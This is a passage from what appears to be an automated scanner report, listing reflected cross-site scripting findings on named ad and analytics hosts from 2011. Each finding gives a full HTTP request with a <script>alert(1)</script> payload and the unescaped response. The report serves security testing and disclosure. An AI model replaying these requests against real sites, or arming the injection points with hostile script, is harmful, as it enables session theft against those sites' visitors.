X-Webserver: oak-tp-app003
Access-Control-Allow-Origin: *
Content-Length: 66
Content-Type: text/plain; charset=utf-8
Connection: keep-alive

Invalid query arguments: 10983<script>alert(1)</script>a859f55dcf4

1.59. http://ar.voicefive.com/b/rc.pli [func parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/rc.pli

Issue detail

The value of the func request parameter is copied into the HTML document as plain text between tags. The payload 41073<script>alert(1)</script>881678aa397 was submitted in the func parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /b/rc.pli?func=COMSCORE.BMX.Broker.handleInteraction41073<script>alert(1)</script>881678aa397&n=ar_int_p85001580&1297260410572 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.12;sz=300x250;click0=http://ib.adnxs.com/click/zMzMzMzMAECPwvUoXI_8PwAAAGBm5vs_TP6COGqw_j-HhsWoaw0CQKL1wI407bt8BWHfHSmrEEI1n1JNAAAAAMWRAwA2AQAAbAEAAAIAAACKwQIA5GoAAAEAAABVU0QAVVNEACwB-gCoAecEDgkAAQUCAAIAAAAAmSbu-wAAAAA./cnd=!ZhZOewie9AIQioMLGAAg5NUBKOcJMaelpaVrDQJAQhMIABAAGAAgASj-__________8BSABQAFioA2AAaOwC/referrer=http%3A//technorati.com//clickenc=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTraderB3/RadioShack/SDYN_2011Q1/300/L38/1314851964/x90/USNetwork/RS_SDYN_2011Q1_ZT_DEF_30/RadioShack_SDYN_2011Q1.html/72634857383030695a694d41416f6366?http://b3.mookie1.com/RealMedia/ads/click_lx.ads/ZapTraderB3/RadioShack/SELL_2011Q1/DYN/300/L42/1232987503/x90/USNetwork/RS_SELL_2011Q1_ZT_DYN_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1232987503?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_da39f516a098b3de&#41; ar_p68511049=exp=8&initExp=Mon Jan 31 16:31:23 2011&recExp=Tue Feb 8 18:06:45 2011&prad=264255448&arc=185637092&; ar_p85001580=exp=52&initExp=Wed Jan 26 20:14:29 2011&recExp=Wed Feb 9 14:06:00 2011&prad=58087509&arc=40400793&; BMX_3PC=1; UID=1d29d89e-72.246.30.75-1294456810; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1297260361%2E433%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 09 Feb 2011 14:09:40 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 83

COMSCORE.BMX.Broker.handleInteraction41073<script>alert(1)</script>881678aa397("");

1.60. http://b.scorecardresearch.com/beacon.js [c1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload f6b68<script>alert(1)</script>ef6909d873d was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8f6b68<script>alert(1)</script>ef6909d873d&c2=6036211&c3=&c4=&c5=&c6=&c10= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://speckyboy.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 16 Feb 2011 13:57:43 GMT
Date: Wed, 09 Feb 2011 13:57:43 GMT
Connection: close
Content-Length: 3580

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
MSCORE.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8f6b68<script>alert(1)</script>ef6909d873d", c2:"6036211", c3:"", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

1.61. http://b.scorecardresearch.com/beacon.js [c10 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload 7731f<script>alert(1)</script>a68c56a1299 was submitted in the c10 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6036211&c3=&c4=&c5=&c6=&c10=7731f<script>alert(1)</script>a68c56a1299 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://speckyboy.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 16 Feb 2011 13:57:44 GMT
Date: Wed, 09 Feb 2011 13:57:44 GMT
Connection: close
Content-Length: 3580

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
mscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6036211", c3:"", c4:"", c5:"", c6:"", c10:"7731f<script>alert(1)</script>a68c56a1299", c15:"", c16:"", r:""});

1.62. http://b.scorecardresearch.com/beacon.js [c2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 67ea4<script>alert(1)</script>08e14236f5f was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=603621167ea4<script>alert(1)</script>08e14236f5f&c3=&c4=&c5=&c6=&c10= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://speckyboy.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 16 Feb 2011 13:57:43 GMT
Date: Wed, 09 Feb 2011 13:57:43 GMT
Connection: close
Content-Length: 3580

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
unction(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"603621167ea4<script>alert(1)</script>08e14236f5f", c3:"", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

1.63. http://b.scorecardresearch.com/beacon.js [c3 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 9be33<script>alert(1)</script>4a9ab7d1f30 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6036211&c3=9be33<script>alert(1)</script>4a9ab7d1f30&c4=&c5=&c6=&c10= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://speckyboy.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 16 Feb 2011 13:57:43 GMT
Date: Wed, 09 Feb 2011 13:57:43 GMT
Connection: close
Content-Length: 3580

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6036211", c3:"9be33<script>alert(1)</script>4a9ab7d1f30", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

1.64. http://b.scorecardresearch.com/beacon.js [c4 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload ab81b<script>alert(1)</script>829280e7c49 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6036211&c3=&c4=ab81b<script>alert(1)</script>829280e7c49&c5=&c6=&c10= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://speckyboy.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 16 Feb 2011 13:57:44 GMT
Date: Wed, 09 Feb 2011 13:57:44 GMT
Connection: close
Content-Length: 3580

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6036211", c3:"", c4:"ab81b<script>alert(1)</script>829280e7c49", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});

1.65. http://b.scorecardresearch.com/beacon.js [c5 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload da613<script>alert(1)</script>50969b4edc7 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6036211&c3=&c4=&c5=da613<script>alert(1)</script>50969b4edc7&c6=&c10= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://speckyboy.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 16 Feb 2011 13:57:44 GMT
Date: Wed, 09 Feb 2011 13:57:44 GMT
Connection: close
Content-Length: 3580

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6036211", c3:"", c4:"", c5:"da613<script>alert(1)</script>50969b4edc7", c6:"", c10:"", c15:"", c16:"", r:""});

1.66. http://b.scorecardresearch.com/beacon.js [c6 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 96c54<script>alert(1)</script>a945613aa0c was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6036211&c3=&c4=&c5=&c6=96c54<script>alert(1)</script>a945613aa0c&c10= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://speckyboy.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Wed, 16 Feb 2011 13:57:44 GMT
Date: Wed, 09 Feb 2011 13:57:44 GMT
Connection: close
Content-Length: 3580

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"8", c2:"6036211", c3:"", c4:"", c5:"", c6:"96c54<script>alert(1)</script>a945613aa0c", c10:"", c15:"", c16:"", r:""});

1.67. http://b3.mookie1.com/2/B3DM/DLX/1@x71 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/B3DM/DLX/1@x71

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bdbd9"><script>alert(1)</script>5626391a536 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DMbdbd9"><script>alert(1)</script>5626391a536/DLX/1@x71 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/DLX/1937870846@x92?
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09419e9045525d5f4f58455e445a4a423660; FarmersBranding=RocketFuelB3; RMFM=011PnAYfG102PB|E106w2|U106y5|G10C7a|G10CEj; dlx_20100929=set; other_20110126=set; session=1297259893|1297259895

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 13:59:43 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 328
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/B3DMbdbd9"><script>alert(1)</script>5626391a536/DLX/1218755221/x71/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><IMG SR
...[SNIP]...

1.68. http://b3.mookie1.com/2/B3DM/DLX/1@x71 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/B3DM/DLX/1@x71

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d169"><script>alert(1)</script>8aae4752285 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/DLX3d169"><script>alert(1)</script>8aae4752285/1@x71 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/DLX/1937870846@x92?
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09419e9045525d5f4f58455e445a4a423660; FarmersBranding=RocketFuelB3; RMFM=011PnAYfG102PB|E106w2|U106y5|G10C7a|G10CEj; dlx_20100929=set; other_20110126=set; session=1297259893|1297259895

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 13:59:46 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 328
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/DLX3d169"><script>alert(1)</script>8aae4752285/1456575303/x71/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><IMG SR
...[SNIP]...

1.69. http://b3.mookie1.com/2/B3DM/DLX/1@x71 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/B3DM/DLX/1@x71

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59104"><script>alert(1)</script>0d7baf3eaeb was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/DLX/1@x7159104"><script>alert(1)</script>0d7baf3eaeb HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/DLX/1937870846@x92?
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09419e9045525d5f4f58455e445a4a423660; FarmersBranding=RocketFuelB3; RMFM=011PnAYfG102PB|E106w2|U106y5|G10C7a|G10CEj; dlx_20100929=set; other_20110126=set; session=1297259893|1297259895

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 13:59:48 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 320
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/DLX/1635821032/x7159104"><script>alert(1)</script>0d7baf3eaeb/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top"><IMG SR
...[SNIP]...

1.70. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297259897490@x90 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297259897490@x90

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec060"><script>alert(1)</script>17affe4c170 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RocketFuelB3ec060"><script>alert(1)</script>17affe4c170/FarmersBranding/2011Q1/BTRT1/728/11297259897490@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=728&h=90&re=19969&pv=0&ra=2599322840.14364759088493884&rb=445&ca=&rc=10.1&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre2599322834474&pb=&pc=&pd=&pg=&ct=1297259932284&pe=http%3A%2F%2Fblog.csdn.net%2Fjiji262%2Farchive%2F2007%2F07%2F28%2F1713771.aspx%3F3541f'style%253d'x%253aexpression(alert(1))'7b381ee316b%3D1&pf=http%3A%2F%2Fblog.csdn.net%2Fjiji262%2Farchive%2F2007%2F07%2F28%2F1713771.aspx%3F3541f'style%253d'x%253aexpression(alert(1))'7b381ee316b%3D1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; ATTWL=CollectiveB3

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 13:59:20 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 364
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5245525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RocketFuelB3ec060"><script>alert(1)</script>17affe4c170/FarmersBranding/2011Q1/BTRT1/728/413346606/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

1.71. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297259897490@x90 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297259897490@x90

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49a73"><script>alert(1)</script>613ad088b59 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/RocketFuelB3/FarmersBranding49a73"><script>alert(1)</script>613ad088b59/2011Q1/BTRT1/728/11297259897490@x90 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=728&h=90&re=19969&pv=0&ra=2599322840.14364759088493884&rb=445&ca=&rc=10.1&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre2599322834474&pb=&pc=&pd=&pg=&ct=1297259932284&pe=http%3A%2F%2Fblog.csdn.net%2Fjiji262%2Farchive%2F2007%2F07%2F28%2F1713771.aspx%3F3541f'style%253d'x%253aexpression(alert(1))'7b381ee316b%3D1&pf=http%3A%2F%2Fblog.csdn.net%2Fjiji262%2Farchive%2F2007%2F07%2F28%2F1713771.aspx%3F3541f'style%253d'x%253aexpression(alert(1))'7b381ee316b%3D1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; ATTWL=CollectiveB3

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 13:59:24 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 365
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2845525d5f4f58455e445a4a423660;path=/

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/RocketFuelB3/FarmersBranding49a73"><script>alert(1)</script>613ad088b59/2011Q1/BTRT1/728/1759311885/x90/default/empty.gif/72634857383030695a694d41416f6366?x" target="_top">
...[SNIP]...

1.72. http://b3.mookie1.com/2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297259897490@x90 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/RocketFuelB3/FarmersBranding/2011Q1/BTRT1/728/11297259897490@x90

Issue detail

